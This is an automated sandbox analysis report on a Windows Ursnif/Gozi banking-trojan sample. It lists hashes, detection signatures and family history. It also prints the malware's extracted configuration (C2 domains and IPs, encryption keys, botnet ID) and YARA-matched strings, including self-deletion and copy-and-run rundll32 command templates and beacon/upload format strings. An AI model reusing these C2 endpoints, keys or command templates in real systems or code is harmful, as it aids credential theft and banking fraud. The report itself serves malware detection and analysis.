Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:834121
MD5:62c6ed30422b5876110ee6ab6660223e
SHA1:60e1a1c26d35c9d90fb163364e3a4deec1d4016a
SHA256:fbb595a285f1126d4bfe09240e40b1a8a66ac5024f90b5e64860bb872e05a248
Tags:agenziaentrateexegoziisfbmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
Contains functionality to query locales information (e.g. system language)
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • server.exe (PID: 5276 cmdline: C:\Users\user\Desktop\server.exe MD5: 62C6ED30422B5876110EE6AB6660223E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{
  "RSA Public Key": "R0Bht5yr3xsiZRHpi1IcuQzz6YItuljDFrXOyTKoaQlwPAAozpclh3dtqYAoNTIiCOiLcKQId5qu05Sa2skMJuIISUXqEWSZ+IAZkoJ0OBq41i9MAk5jYXBlhytm5kbe+FMWRShoa8oCYchGlG9NgOodr8XQtZdDCJW9xmKfhwDRkZoE+G2m4TOwcjqzcerFacks/3HGeYJ/jMn7p8mdhgGNbMkoKIT/xFVRX5VcOCuobljxHriqIaIaQdUGlw8xtl5qDXpJ1csBauHGSZ6RQY7ls8Ja+v/1aH+JgeCIQ3FiKBeHVCv6UuNvcyy6vYLMPGQwddKCKyqcgzolzbWcSfALrntnMTN8HRf9wsUd/no=",
  "c2_domain": [
    "checklist.skype.com",
    "193.233.175.115",
    "185.68.93.20",
    "62.173.140.250",
    "46.8.210.133"
  ],
  "botnet": "7716",
  "server": "50",
  "serpent_key": "XmIRUTaZ9Sm6Rr81",
  "sleep_time": "45",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
SourceRuleDescriptionAuthorStrings
00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 28 entries
      SourceRuleDescriptionAuthorStrings
      0.2.server.exe.4e394a0.3.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0.2.server.exe.47e0000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: server.exeReversingLabs: Detection: 37%
          Source: server.exeVirustotal: Detection: 40%Perma Link
          Source: server.exeJoe Sandbox ML: detected
          Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
          Source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "R0Bht5yr3xsiZRHpi1IcuQzz6YItuljDFrXOyTKoaQlwPAAozpclh3dtqYAoNTIiCOiLcKQId5qu05Sa2skMJuIISUXqEWSZ+IAZkoJ0OBq41i9MAk5jYXBlhytm5kbe+FMWRShoa8oCYchGlG9NgOodr8XQtZdDCJW9xmKfhwDRkZoE+G2m4TOwcjqzcerFacks/3HGeYJ/jMn7p8mdhgGNbMkoKIT/xFVRX5VcOCuobljxHriqIaIaQdUGlw8xtl5qDXpJ1csBauHGSZ6RQY7ls8Ja+v/1aH+JgeCIQ3FiKBeHVCv6UuNvcyy6vYLMPGQwddKCKyqcgzolzbWcSfALrntnMTN8HRf9wsUd/no=", "c2_domain": ["checklist.skype.com", "193.233.175.115", "185.68.93.20", "62.173.140.250", "46.8.210.133"], "botnet": "7716", "server": "50", "serpent_key": "XmIRUTaZ9Sm6Rr81", "sleep_time": "45", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_047E1508

          Compliance

          barindex
          Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
          Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: queries for: checklist.skype.com

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_047E1508

          System Summary

          barindex
          Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: server.exe, 00000000.00000000.257940340.0000000002B56000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegunshot.exe6 vs server.exe
          Source: server.exeBinary or memory string: OriginalFilenamegunshot.exe6 vs server.exe
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E16DF0_2_047E16DF
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E832C0_2_047E832C
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E1D8A0_2_047E1D8A
